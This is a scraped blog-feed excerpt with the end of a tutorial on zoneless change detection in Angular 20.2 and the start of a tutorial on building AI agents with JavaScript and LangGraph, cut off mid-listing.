In Figure 10, we see a zoneless application’s component tree, where all components use the default change detection strategy. When a user clicks a button inside one of the child components, the click event triggers change detection.

In the next step (Figure 11), Angular marks the component where the click happened, together with all of its ancestors up to the root, as dirty. Then Angular runs the change detection process (Figure 12).

The key difference is only in how change detection is triggered. Zone.js used to fire it on every patched async operation, while zoneless relies on explicit triggers like user events, signals, or async pipe.

Finally, it’s worth clarifying that Angular never “re-renders” components. That’s a common misconception. Angular simply checks bindings, and if a change is detected, it updates only the affected DOM nodes.

Figure 11: Default change detection – Mark View Dirty

Figure 12: Default change detection – components checked

  • OnPush strategy: With OnPush, Angular checks only those components that have been explicitly marked as dirty.

Figure 13: onPush change detection – trigger change detection by click event

Let’s look at a mixed setup: some components use OnPush, others stick to the default strategy (Figure 13). A user clicks a button inside an OnPush component. Angular marks that component and its ancestors dirty, same as before (Figure 14).

Figure 14: onPush change detection – Mark View Dirty

But here’s the twist. With OnPush, Angular only checks components that are actually marked as dirty. If an OnPush component isn’t marked dirty, Angular skips it entirely, along with all of its children (Figure 15). In our case, the parent of the clicked component is OnPush and marked dirty, so Angular checks it, and because that parent has another child using the default strategy, that sibling gets checked as well.

Figure 15: onPush change detection – components checked

  • Local change detection with OnPush + Signals: Imagine we have a component tree where all components use OnPush change detection and rely on signals in their templates (Figure 16).

Figure 16: “Local” change detection – onPush + signal change + async task

When an asynchronous task triggers a change in a signal, this update does not mark all ancestors as dirty. Instead, only the component consuming that signal (the “consumer”) is tagged as dirty.

Figure 17: “Local” change detection – Marking consumer dirty and ancestors with flag HasChildViewsToRefresh

But what about its ancestors? Ancestors aren’t marked as dirty, but instead receive a special marker called HasChildViewsToRefresh (Figure 17). This marker tells Angular that the component itself is clean, but it has children that need to be refreshed.

During change detection, Angular starts traversal from the root, skipping any OnPush components that aren’t dirty. However, when it encounters a component with the HasChildViewsToRefresh flag, it knows to continue down into its subtree. In this way, Angular bypasses clean components and focuses only on the path that leads to the consumer of the changed signal, ensuring that updates are applied exactly where they are needed (Figure 18).

It’s important to note that this optimization only works if the signal update isn’t triggered by mechanisms that already mark components as dirty (for example, an event listener). In that case, the ancestors will be marked both as dirty and with the HasChildViewsToRefresh flag, which means Angular will check them as well.

Figure 18: “Local” change detection – Angular runs check detection only in component where signal value changed

Summing up this section: a trigger starts the process, and the strategy decides its scope. Now it’s time to see what preparation is needed before going zoneless.

Preparing for Zoneless

If we want to go zoneless, we first need to prepare our apps. It’s not just about removing Zone.js; we also need to make sure our components know how to notify Angular about changes. In other words, we have to replace the “magic” that Zone.js gave us with explicit signals, async pipes, or markForCheck calls. Once that’s in place, the transition becomes smooth and more predictable.

The very first step is to switch all components to the OnPush change detection strategy. Why? Because it immediately reveals what will stop working once Zone.js is gone. By forcing Angular to update only when explicitly notified, we can clearly see which parts of the app rely on Zone.js magic, and fix them before the actual migration.

Let’s look at some examples to see the most common issues you’ll run into, and which solutions will continue to work just fine. All examples below are shown using Angular 20.2, since that’s the version where zoneless mode is stable and safe to adopt.

Figure 19: View of an example component showing ship crew members

I’ll start with a simple example, a component that displays the ship crew. Initially, everything works fine, we fetch the crew list with an HTTP request, subscribe to it in the component, and assign the result to a crewMembers variable. The template shows the first loading message, and then the data.

Listing 1:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
})
export class CrewWidgetComponent implements OnInit {
  protected crewMembers: CrewMember[] = [];
  protected isLoading = true;
  private crewService = inject(CrewService);
  private destroyRef = inject(DestroyRef);

  ngOnInit(): void {
    this.crewService.getCrewMembers()
      .pipe(
        finalize(() => this.isLoading = false),
        takeUntilDestroyed(this.destroyRef)
      )
      .subscribe(members => {
        this.crewMembers = members;
      });
  }
}

But once we switch the component to the OnPush change detection strategy, things suddenly break. Instead of the crew list, we keep seeing the “loading” state, even though the HTTP call has already completed. Why does this happen?

Figure 20: View of an example component with loading state, when onPush strategy was turned on

Previously, Zone.js automatically tracked async tasks, such as HTTP requests. When the request finished, it triggered change detection for us. Without Zone.js, nothing notifies Angular that the data has arrived, so the UI never updates.

At this point, we have to trigger change detection ourselves. One option is to inject ChangeDetectorRef and call markForCheck after updating crewMembers. You can use it if you have to, but there are usually better options.

Listing 2 – markForCheck:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent implements OnInit {
  protected crewMembers: CrewMember[] = [];
  protected isLoading = true;
  private crewService = inject(CrewService);
  private destroyRef = inject(DestroyRef);
  private changeDetector = inject(ChangeDetectorRef);

  ngOnInit(): void {
    this.crewService.getCrewMembers()
      .pipe(
        finalize(() => this.isLoading = false),
        takeUntilDestroyed(this.destroyRef)
      )
      .subscribe(members => {
        this.crewMembers = members;
        // Explicitly notify Angular that this view needs to be checked
        this.changeDetector.markForCheck();
      });
  }
}

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @if(!isLoading) {
    <ul class="crew-list">
      @for(member of crewMembers; track member.id) {
                  <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>              
      }
    </ul>
  } @else {
    <div class="loading">
      <span>Loading crew members...</span>
    </div>
  }
</div>

A much better approach is to use the async pipe. It eliminates the need for manual subscription logic in your component and guarantees that Angular updates the view whenever data changes.

Listing 3 – Async Pipe:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent, AsyncPipe],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent {
  private crewService = inject(CrewService);
  crewMembers$ = this.crewService.getCrewMembers();
}

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @let crewMembers = crewMembers$ | async;
  @if(crewMembers) {
    <ul class="crew-list">
      @for(member of crewMembers; track member.id) {
                  <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>
      }
    </ul>
  } @else {
    <div class="loading">
      <span>Loading crew members...</span>
    </div>
  }
</div>

We can also take advantage of toSignal. With it, we transform an observable into a signal inside our component. Whenever the observable emits a new value, the signal’s value is updated, and Angular reacts right away. Subscriptions are managed under the hood, so we avoid the extra boilerplate of manual unsubscribe logic. In the template, we just use our signal instead of the observable, but we have to call it with (), e.g., crewMembers(), to get the signal’s value.

Listing 4 – Signals:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent {
  private crewService = inject(CrewService);
  // toSignal (from @angular/core/rxjs-interop) manages the subscription for us
  crewMembers = toSignal(this.crewService.getCrewMembers());
}

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @if(crewMembers()) {
    <ul class="crew-list">
      @for(member of crewMembers(); track member.id) {
          <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>
      }
    </ul>
  } @else {
    <div class="loading">
      <span>Loading crew members...</span>
    </div>
  }
</div>

Beyond async pipes and signals, there’s also a new player: httpResource. It’s still experimental, but it already works seamlessly in a zoneless environment. Why? Because it doesn’t rely on Zone.js at all; it exposes its state through signals, making it a natural fit for the new change detection model.

Listing 5 – httpResource:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent {
  // httpResource exposes value(), isLoading(), and hasValue() as signals
  crew = httpResource<CrewMember[]>(() => `http://localhost:3000/crew`);
}

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @if(crew.hasValue()) {
    <ul class="crew-list">
      @for(member of crew.value(); track member.id) {
    <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>
      }
    </ul>
  }
  @if(crew.isLoading()) {
    <div class="loading">
      <span>Loading crew members...</span>
    </div>
  }
</div>

Another common pitfall comes from using setTimeout or setInterval. In a zoneless app, they no longer trigger change detection automatically. If your code relies on them, you’ll need to adjust it before migrating. Depending on the case, you can either call markForCheck to notify Angular manually or update a signal value directly. Just remember, for the signal update to refresh the UI, it has to be read in the template. If you’re working with an observable, ensure it’s consumed via the async pipe, so updates are picked up correctly.

Listing 6 – setInterval not triggering change detection in zoneless app:

rumStockValue = 100;

// some code

setInterval(() => {
  this.rumStockValue = this.simulateRumConsumption();
}, 10000);

Listing 7 – setInterval with signal value change:

rumStockValue = signal(100);

// some code

setInterval(() => {
  this.rumStockValue.set(this.simulateRumConsumption());
}, 10000);

Angular also gives us a safety net to verify that our app is truly zoneless-ready. By adding provideCheckNoChangesConfig({ exhaustive: true, interval: <milliseconds> }) to app.config.ts, we can enable a periodic debug check that ensures no state changes slip by unnoticed. If Angular detects a binding update that wouldn’t have been refreshed by zoneless change detection, it throws an ExpressionChangedAfterItHasBeenCheckedError. This helps us catch hidden dependencies on Zone.js before they become real issues in production.

Listing 8:

export const appConfig: ApplicationConfig = {
  providers: [
    provideBrowserGlobalErrorListeners(),
    provideZonelessChangeDetection(),
    provideCheckNoChangesConfig({exhaustive: true, interval: 1000}),
    provideRouter(routes),
    provideHttpClient(),
  ]
};

Figure 21: Angular throws ExpressionChangedAfterItHasBeenCheckedError when a binding changes without notifying change detection

With this in place, we now have the full picture: how change detection behaves under different strategies, what pitfalls appear when removing Zone.js, and how tools like signals and the async pipe help us stay in control.


Conclusion: The End of an Era, the Start of Another

Zone.js has been part of Angular from the very beginning, bringing the “magic refresh” that automatically kept UIs in sync. For years, it simplified development and allowed developers to focus on building features instead of managing updates manually. But as applications grew larger and the web evolved, the hidden costs of that magic became harder to ignore: performance overhead, noisy debugging, compatibility issues, and extra complexity in testing.

That’s why the shift to zoneless marks an important milestone in Angular’s evolution. Developers can finally build apps without Zone.js, relying instead on signals, markForCheck, and OnPush-friendly patterns.

Zone.js was magic. Zoneless is mastery. With Angular 20.2, you can finally leave the overhead behind, build apps that are faster and easier to debug, and take full control of change detection. The future of Angular is zoneless. It’s time to join it.


🔍 Frequently Asked Questions (FAQ)

1. What is zoneless mode in Angular?

Zoneless mode in Angular removes the need for Zone.js to trigger change detection. Instead, updates rely on explicit triggers like signals, template events, or markForCheck().

2. Why did Angular move away from Zone.js?

Angular phased out Zone.js to improve performance, reduce bundle size, simplify debugging, and give developers explicit control over UI updates.

3. Which Angular version introduced stable zoneless mode?

Zoneless mode became stable with Angular 20.2. Earlier versions, like Angular 18, included experimental support for it.

4. How do you enable zoneless mode in a new Angular project?

You can enable zoneless mode using the --zoneless flag when creating a project with Angular CLI 20.2+, or by choosing the zoneless option when prompted during setup.

5. How does change detection work without Zone.js?

In zoneless Angular, change detection is triggered by user events, signal updates, async pipes, or manual calls to markForCheck() instead of monkey-patched async APIs.

6. What are the trade-offs of migrating to zoneless Angular?

You lose automatic change detection and must refactor to use signals or the OnPush strategy. Legacy code tied to Zone.js may require adjustments.

7. What tools help validate a zoneless Angular app?

Use provideCheckNoChangesConfig({ exhaustive: true }) to enable runtime checks. It detects untracked changes and helps confirm you’re zoneless-ready.

8. What role does Angular 20 play in preparing for Angular 21?

Angular 20 introduces stable zoneless APIs and paves the way for deeper reactivity primitives and simplifications in Angular 21. The transition marks a strategic shift towards a leaner core and more modern development model.

The post No More Zone.js: A Better Way to Build Angular Apps with Angular 20.2 appeared first on International JavaScript Conference.

]]>
Build an AI Agent with JavaScript and LangGraph https://javascript-conference.com/blog/build-ai-agents-javascript-langgraph/ Wed, 17 Sep 2025 07:50:54 +0000 https://javascript-conference.com/?p=108401 Artificial intelligence has evolved far beyond just chat applications. Features powered by large language models (LLMs) are now being integrated into a growing number of apps and devices. Many web platforms offer not only AI chatbots but also intelligent search functions that help users find relevant content, as well as fraud detection systems that use anomaly detection to identify suspicious login attempts or fraudulent online payments. Let’s look at an example of how to build such an application using LangGraph.

The post Build an AI Agent with JavaScript and LangGraph appeared first on International JavaScript Conference.

]]>
One thing in common between all the systems mentioned is that they accept input and generate output based on their trained knowledge. This output can then be processed by the application and presented to the user. A concrete example of such an AI application is a smart lamp. It has been trained to respond to specific commands such as “Turn on the light,” “Dim the light to 50%,” or “Turn off the light at 10 p.m.” The system is limited by its architecture and training data.

AI agents address this problem. These are software components that are capable of making decisions independently and executing actions based on those decisions. In the example with the smart lamp, one goal for the AI agent could be to always provide the perfect lighting without you worrying about it. The agent observes when you wake up and how lighting conditions change with the weather and time of day. It decides when it makes sense to turn on the light. For instance, if you want to sleep longer on Sundays, the light will turn on later. The actions it takes might include gradually brightening the light in the morning when you wake up or shifting to a warmer color tone in the evening as you wind down. Over time, the AI agent learns more about your habits, for example preferring to switch to cinema mode when you watch a movie in the evening or using more natural light in the afternoon.

The term AI agent is therefore not a new name for a semi-intelligent chatbot, but refers to software with very specific characteristics:

  • Autonomy: The AI agent can act independently within a certain framework. It does not work purely on a command basis, but continuously observes its environment and acts on its own initiative. This enables it to react to its environment and pursue its goals in the long term. In the case of the smart lamp, this means that you do not have to switch the light on and off yourself. Depending on the application, an AI agent can allow interactions and learn from them. This means that you can still control the light yourself. The agent will then adapt its behavior in the future so that intervention should no longer be necessary.
  • Goal orientation: The actions of an AI agent are usually determined by a specific goal or a combination of several goals.
  • Interaction with complex environments: AI agents play to their strengths above all in dynamic and unpredictable environments. If you work in such an environment with conventional architectures, you have to anticipate a wide variety of cases. An AI agent can respond to events in its environment, adapt its behavior, and get to know its environment better over time. The smart lamp not only takes the time of day into account in its actions, but also your behavior and habits, as well as external influences such as sunrise, sunset, or the weather.
  • Learning over a longer period of time: AI agents can learn from their environment. This includes both dynamic changes in the environment and interactions between people or other systems and the agent. The smart lamp not only turns the light on and off, but also ensures optimal lighting in different situations, whether you are reading a book, watching a movie, or preparing a meal.

For an AI agent to work, you must ensure that it can perceive its environment, give it a goal, and invest a certain amount of time in the initial learning process.

From Idea to Practice: AI Agents in JavaScript with LangGraph

AI agents can be implemented in different languages and on different platforms. The most commonly used languages are currently Python and JavaScript or TypeScript.

The LangChain library exists for both programming languages and implements AI applications in the form of chained modules. LangGraph, a library for modeling and implementing AI agents, comes from the same vendor. In this article, we use the JavaScript version of this library on Node.js, which stands out for its lightweight architecture and asynchronous I/O.

The library focuses on controlling data flows and states in the application. It allows you to integrate any models and tools. The most important terms in a LangGraph application are:

  • State: The state contains information about the structure of the graph. It also stores the application’s variable data. The graph also has reducer functions that LangGraph can use to update the state.
  • Node: A graph generally consists of nodes and edges. In the specific case of LangGraph, a node is a JavaScript function that contains the agent’s logic. These functions can use an LLM, send queries to a search engine, or execute any local logic.
  • Edge: The edges of the graph connect the nodes of the graph and thus determine which node function is executed next.

A Concrete Example – What Time Is It?

To make things a little less abstract, let’s take a look at a concrete example. With this application, you can ask a locally executed LLM for the current time. If you use a simple local model such as Llama or Mistral, you can draw on an extensive knowledge base and be sure that your personal data will not be used for training purposes or analyzed in any other way, but the model cannot access current or dynamic data such as the date or time. In this example, you enrich the model with a function that returns the current date and time.

The implementation consists of two nodes: model, which is responsible for communicating with the LLM, and getCurrentDateTime, which contains the tool function for the date and time. The code in Listing 1 shows how the nodes are implemented and connected with edges.

Listing 1: LangGraph application with access to time and date

import { AIMessage, HumanMessage } from '@langchain/core/messages';
import { ToolNode } from '@langchain/langgraph/prebuilt';
import { StateGraph, MessagesAnnotation } from '@langchain/langgraph';
import { tool } from '@langchain/core/tools';
import { ChatOllama } from '@langchain/ollama';
import { z } from 'zod';

const getCurrentDateTime = tool(
  async () => {
    const now = new Date();
    const result = `Current date and time in UTC: ${now.toISOString()}`;
    return result;
  },
  {
    name: 'getCurrentDateTime',
    description: 'Returns the current date and time in UTC.',
    schema: z.object({}),
  }
);

const tools = [getCurrentDateTime];
const toolNode = new ToolNode(tools);

const model = new ChatOllama({ model: 'mistral-nemo' }).bindTools(tools);

function shouldContinue({ messages }: typeof MessagesAnnotation.State) {
  if ((messages[messages.length - 1] as AIMessage).tool_calls?.length) {
    return 'getCurrentDateTime';
  }
  return '__end__';
}

async function callModel(state: typeof MessagesAnnotation.State) {
  const response = await model.invoke(state.messages);
  return { messages: [response] };
}

const workflow = new StateGraph(MessagesAnnotation)
  .addNode('model', callModel)
  .addEdge('__start__', 'model')
  .addNode('getCurrentDateTime', toolNode)
  .addEdge('getCurrentDateTime', 'model')
  .addConditionalEdges('model', shouldContinue);

const app = workflow.compile();

const time = await app.invoke({
  messages: [new HumanMessage('How late is it?')],
});
console.log(time.messages.at(-1)?.content);

const timeMuc = await app.invoke({
  messages: [
    ...time.messages,
    new HumanMessage('And how late is it in Munich, Germany?'),
  ],
});

console.log(timeMuc.messages.at(-1)?.content);

The core of the implementation is the ToolNode, which supplies the LLM with current data. You create such a node by calling the tool function. You pass it the function that is to be behind the node. In this example, this function returns the current date and time as an ISO string. In addition to this function, you also define an object with meta information such as the name of the ToolNode, a description, and a schema. The bindTools method of the LLM instance is used to make the tools known. The LLM has access to the meta information and thus knows which tools are available to it for which purpose.

If the LLM receives a request that requires the current time, it does not provide a direct answer but informs the application that the ToolNode should be executed. In this example, the function is executed without any additional parameters. However, you also have the option of defining parameters via the schema; the LLM passes these on when calling the tool, and you can access them in the tool function. This allows you to control the execution of the function and deliver a suitable result. It is important to define a description for the values in the schema using the describe method. The tool function alone does not yet create a node for LangGraph. To do this, you must pass the created object in an array to the constructor of the ToolNode class.
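
As an illustration of such a parameterized tool, the following hypothetical variant accepts a time zone through the schema. The name and logic are our own and build on the imports from Listing 1; only the tool and describe usage mirror the pattern described above:

const getTimeInTimeZone = tool(
  async ({ timeZone }) => {
    // Format the current time for the requested IANA time zone
    return new Intl.DateTimeFormat('en-US', {
      timeZone,
      dateStyle: 'full',
      timeStyle: 'long',
    }).format(new Date());
  },
  {
    name: 'getTimeInTimeZone',
    description: 'Returns the current date and time for a given IANA time zone.',
    schema: z.object({
      timeZone: z.string().describe('IANA time zone name, e.g. "Europe/Berlin"'),
    }),
  }
);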

The second node in the graph is the model. In the example, the ChatOllama class is used to integrate a local LLM provided by Ollama. Specifically, the mistral-nemo model is used. Which LLM you choose depends on a variety of factors: Do you want to use a local open-source model such as Mistral or Llama, or would you prefer a commercial model such as GPT-4o from OpenAI? If you decide on a local model, the question arises as to what resources are available to you and whether you should opt for a smaller and therefore more economical model, such as the 3B variant of Llama 3.2, or a large model such as the Llama 3.1 model with 405B parameters. The smaller model can run efficiently on a computer with a standard graphics card. The large models require powerful and therefore expensive hardware.

With these two nodes, you can now proceed to create the state graph for the application. When creating the graph, you pass a structure that defines the state structure and a reducer function for updating the state. LangGraph provides the MessagesAnnotation, which only provides a state key with the name messages and the associated reducer. The instance of the StateGraph class has the methods addNode for adding nodes and addEdge for connecting the nodes. Figure 1 shows the graph for the example.

Figure 1: Structure of the application graph

The graphical representation reveals another special feature. You can use the addConditionalEdges method to insert a branch; this is implemented in the shouldContinue function. It receives all messages and checks whether the last message from the model contains a tool call. If this is the case, the process is forwarded to the ToolNode. Otherwise, the run is terminated. A complete run through the graph looks like this:

  1. The edge labeled start marks the start of the graph and connects it to the model.
  2. The model node is executed. The model receives the prompt, processes it, and returns the result.
  3. The edge inserted with the addConditionalEdges method checks whether a Tool call is required. If this is not the case, the run is terminated with end. Otherwise, the edge connects the model to the ToolNode.
  4. The ToolNode is called and returns the current date and time.
  5. The edge connecting the ToolNode and the model ensures that the state enriched by the output of the Tool function is made available to the model.
  6. The model receives the extended prompt and can generate a response.
  7. The model does not require any further Tool calls, and the application is terminated by the conditional edge.

The compile method of the StateGraph instance creates an executable application to which you can pass any prompt using the invoke method. Assuming you call the application on December 1, 2025, at 3:02 p.m., you will receive the output “It’s currently 3:02 PM on December 1st.” As shown in the example, if you execute the invoke method again and pass the message history, the application does not execute another Tool call and uses the information from the previous run.

This example uses a tool node to counteract a weakness of LLMs: they know nothing about current or dynamic data. It also shows the essential features of a LangGraph application, but also the limitations you face when integrating smaller language models. The responses are not always consistent. For most queries, the model responds with a correct answer. The time returned here is in the UTC time zone. If you ask for the current time in a different time zone, as in the second prompt, you may get the correct answer, but you may also find that Munich is suddenly in a time zone 6 hours behind UTC. In addition, during testing, the results for German-language prompts were significantly worse than for their English equivalents. To solve the time zone problem, you could, for example, register another tool that resolves time zones correctly and uses this information to obtain the correct time. In the next example application, you will learn about another use case for LangGraph that differs more significantly from the usual chatbot application.

This example already shows the essential features of a LangGraph application. The application consists of several nodes connected by edges. This architecture allows you to create both simple and very complex applications by assembling them from small, loosely coupled building blocks. The application gains additional flexibility because you can exchange nodes or insert new ones. You can also create conditions and thus take different paths through the graph at runtime. Although the time announcement example demonstrates some basic architectural features of LangGraph, it is still a long way from a real AI agent. For this reason, we will now look at another example of a LangGraph application that will introduce you to further features of an AI agent and show you other possible uses for the library.

Another Example: The Digital Shopping Cart

The following example relies less on an LLM to control the application and instead integrates an LLM to perform a very specific task. The rest of the application consists of a simple graph with a few additional nodes. The application is designed to evaluate images of products and recognize which and how many products are depicted. The products are placed in the shopping cart and the price for the individual products and the entire shopping cart is determined. At the end, the application outputs a tabular list of the shopping cart. The application is based on Node.js and is operated via the command line. The product images are stored in the file system and are read in when used. Communication takes place via command-line input.

One of the most common use cases for a LangGraph application is a chatbot. That’s why LangGraph also provides the MessagesAnnotation, which allows you to implement a message-based system without any further changes. However, you are not limited to this structure, but can model the state as you wish. The basis for this is provided by LangGraph’s Annotation structures. The GraphState of an application is structured like a tree and has a root node that you define with Annotation.Root. This then contains any object structure. Listing 2 shows how the GraphState of the sample application is structured.

Listing 2: Generating the GraphState

import { Annotation } from '@langchain/langgraph';
import { z } from 'zod';

const schema = z.object({
  totalPrice: z.number(),
  cart: z.array(
    z.object({
      image: z.string(),
      name: z.string().optional(),
      price: z.number().optional(),
      quantity: z.number().optional(),
    })
  ),
});

type StateType = z.infer<typeof schema>;
// A single cart entry, not the whole array
type CartItem = StateType['cart'][number];

const cartAnnotation = {
  totalPrice: Annotation<number>,
  cart: Annotation<CartItem[]>,
};

const State = Annotation.Root(cartAnnotation);

The GraphState contains two fields: the total price in the totalPrice property and the shopping cart in the cart property. You model the details of the state using LangGraph’s Annotation functions. These are implemented as TypeScript generics so that you can pass the type of the respective property. The total price is a simple number, and the shopping cart consists of an array of objects representing the individual products. If you do not specify anything else in the Annotation functions, LangGraph will overwrite the previous value in the state when a change is made. Alternatively, you can call the Annotation function and pass it an object with a reducer function and a default value. The reducer is then responsible for generating the new state of the StateGraph from the previous state and additional data. In our example, the node functions of the application itself take care of updating the state, so no separate reducer function is required.

The state not only represents the current state of the application, but also serves to exchange information between the individual nodes. The nodes do not simply pass information to each other, but store it in the state. This has the advantage that the state of the application can be better understood. This makes the application more flexible, as you are not dependent on fixed interfaces between the nodes. If you persist the state, you can pause the execution of the application and continue at the same point without losing any data.
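
LangGraph supports exactly this through checkpointers. The following is a minimal sketch, assuming the MemorySaver checkpointer exported by @langchain/langgraph and the graph object from Listing 5 below; the thread_id value is illustrative:

import { MemorySaver } from '@langchain/langgraph';

// Compile the graph with a checkpointer so the state is persisted after every step
const app = graph.compile({ checkpointer: new MemorySaver() });

// All invocations that share a thread_id operate on the same persisted state,
// so a later call resumes where the previous one left off. MemorySaver keeps
// the state in memory; a database-backed checkpointer would survive restarts.
const config = { configurable: { thread_id: 'cart-session-1' } };
await app.invoke({ totalPrice: 0, cart: [] }, config);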

In addition to the state, the nodes and edges of the graph are the most important building blocks of the application. Figure 2 shows the nodes of the application and their connections. In the following, you will learn about the special features of the individual nodes and how they interact.

Figure 2: Visualization of GraphState

AskForNextProduct – Which Product Should Be Added?

The askForNextProduct node starts the process. It uses the Readline module from Node.js to query user input on the command line. The application expects the name of a file containing the image of a product. For example, you can enter “DSC_0435.jpg.” A file with this name must then be located in the application’s input directory and will be read in later in the graph. The node only takes care of querying the file name and must pass it on to the next node in the graph. So you need to save this info in the GraphState. To do this, the node adds a new element to the cart array and writes the file name to the image field. Entering a file name is a simplification for this app. At this point, you can implement any image source you want. For example, you can create a front end for the app and upload the images via the browser.

askForNextProduct has a special feature because it is connected to the detectProduct and showCart nodes via a ConditionalEdge. If you enter the string finished, this means that no further products should be added to the shopping cart and the shopping cart should be displayed. In this case, the ConditionalEdge calls the showCart node. In all other cases, the application continues with the detectProduct node to identify the product.
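
The article doesn’t list the code for this node, but a minimal sketch could look like the following; the node and edge names match the graph registration shown later in Listing 5, while the readline handling and the "finished" marker entry are illustrative:

import * as readline from 'node:readline/promises';

async function askForNextProduct(state: StateType): Promise<StateType> {
  const rl = readline.createInterface({ input: process.stdin, output: process.stdout });
  const answer = await rl.question('Image file name (or "finished"): ');
  rl.close();
  // Store the input in a new cart entry so the following nodes can read it
  return { ...state, cart: [...state.cart, { image: answer }] };
}

// ConditionalEdge: decide whether to show the cart or detect the next product
function showCartOrDetectProduct(state: StateType) {
  const last = state.cart[state.cart.length - 1];
  // A real implementation would remove the marker entry before showing the cart
  return last?.image === 'finished' ? 'showCart' : 'detectProduct';
}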

DetectProduct – Product Recognition with a Vision Model

In the example in Listing 3, the detectProduct node uses the llama3.2-vision:11b model for image recognition. The prompt is important here. You specify the context, i.e., that the model is to be used for product recognition and that the number of products found is to be counted. You also specify the output format in the form of a JSON string with a concrete example. You can pass both the name of the file and a Base64-encoded image directly to the Ollama library used here. By formulating the prompt in this way, you have ensured that you will receive valid JSON as a response, which you can insert directly into the last element of the shopping cart array in GraphState.

Listing 3: detectProduct ToolNode

import ollama from 'ollama';

const detectProduct = tool(
  async (state: StateType): Promise<StateType> => {
    console.log('Detecting product...');

    const { message } = await ollama.chat({
      model: 'llama3.2-vision:11b',
      messages: [
        {
          role: 'user',
          content: `You are a vision model for a pet shop. What 
            product do you see and how many are there. Answer in 
            the following json string structure 
            { "name": "name", "quantity": 1}`,
          images: [`./input/${state.cart[state.cart.length - 1].image}`],
        },
      ],
    });
    const visionModelResponse = JSON.parse(message.content);

    const clonedState = { ...state };
    clonedState.cart[clonedState.cart.length - 1] = {
      ...clonedState.cart[clonedState.cart.length - 1],
      ...visionModelResponse,
    };
    return clonedState;
  },
  {
    name: 'detectProduct',
    description: 'Detects a product.',
    schema,
  }
);

CalculatePrice – Read Data from the Database

This is another simplification for our example. The CalculatePrice node reads the name of the product from the last element of the shopping cart array and uses it for a database query. The result is the price of the product you are looking for. You can make the search for the right product as complex as you like. A simple extension would be to normalize the spelling so that it doesn’t matter whether you search for “apple” or “apples.” You can also use a smart, AI-based product search, which significantly improves the application but also significantly increases the response time in most cases.

In the example, we assume that a match was found for the image and the product name derived from it. The calculatePrice function adds the price to the corresponding shopping cart item and passes control to the calculateTotalPrice node configured in the application.
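
The article doesn’t show this node’s code either, so here is a simplified sketch; the in-memory price table stands in for the actual database query and its contents are purely illustrative:

// Illustrative stand-in for a real database lookup
const PRICES: Record<string, number> = { 'dog food': 4.99, 'cat toy': 2.49 };

async function calculatePrice(state: StateType): Promise<StateType> {
  const item = state.cart[state.cart.length - 1];
  const price = PRICES[item.name?.toLowerCase() ?? ''] ?? 0;
  // Write the price into the last cart entry
  const cart = [...state.cart];
  cart[cart.length - 1] = { ...item, price };
  return { ...state, cart };
}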

CalculateTotalPrice – Calculate the Sum

The calculateTotalPrice node is an example of a very simple operation. It uses the Array-reduce function to calculate the sum of the prices of all items in the shopping cart. In theory, you could also have a language model perform operations like this, but a calculation in the source code has the advantage that it always works, and you don’t have to worry about the language model starting to hallucinate and adding or omitting products or simply changing prices on its own. The code in Listing 4 also shows a simplification of LangGraph that allows you to update only part of the GraphState.

Listing 4: calculateTotalPrice ToolNode

const calculateTotalPrice = tool(
  async (state: StateType) => {
    console.log('Calculating total price...');
    const totalPrice = state.cart.reduce((acc, item) => {
      return acc + item.price! * item.quantity!;
    }, 0);
    console.log(`Current total price: ${totalPrice}`);
    return { totalPrice };
  },
  {
    name: 'calculateTotalPrice',
    description: 'Calculates the total price of the cart.',
    schema,
  }
);

As with the totalPrice property, if you only specify the structure of part of the GraphState, LangGraph will only update that part. Here, another standard behavior of the library comes into play. If you do not define a reducer function when creating the GraphState, LangGraph will overwrite the value with the update. For a simple number, this behavior is not a problem. However, with an object structure such as the cart state, this can become a problem. Here, you can implement the desired behavior yourself using a reducer.
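
A minimal sketch of such a reducer, assuming the cart should merge incoming entries instead of being overwritten; the merge strategy itself depends on what your nodes return and is illustrative here:

const cartAnnotation = {
  totalPrice: Annotation<number>,
  cart: Annotation<CartItem[]>({
    // Append incoming items to the existing cart instead of replacing it
    reducer: (current, update) => [...current, ...update],
    default: () => [],
  }),
};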

After updating the total price, the loop in the StateGraph closes and the askForNextProduct node waits for the next input until the cycle is interrupted by the input of finished and the entire shopping cart is displayed.

ShowCart – Displaying the Shopping Cart

Before the application terminates, the shopping cart is displayed on the console. The showCart node uses the console.table function for this purpose and reads from the GraphState. This node only accesses the state in read-only mode and returns it unchanged. It is also the final node of the graph and is connected via an edge to the end node, which terminates the application.

The Nodes and Edges of the Application

As in the previous example, you use the StateGraph class, to which you pass the configured state during instantiation. Use the addNode, addEdge, and addConditionalEdges functions to define the nodes and connect them with edges. Call the compile function on the resulting object and then start the application by calling the invoke method, as shown in Listing 5.

Listing 5: Registration of nodes and edges

const graph = new StateGraph(State)
  .addNode('detectProduct', detectProduct)
  .addNode('calculatePrice', calculatePrice)
  .addNode('calculateTotalPrice', calculateTotalPrice)
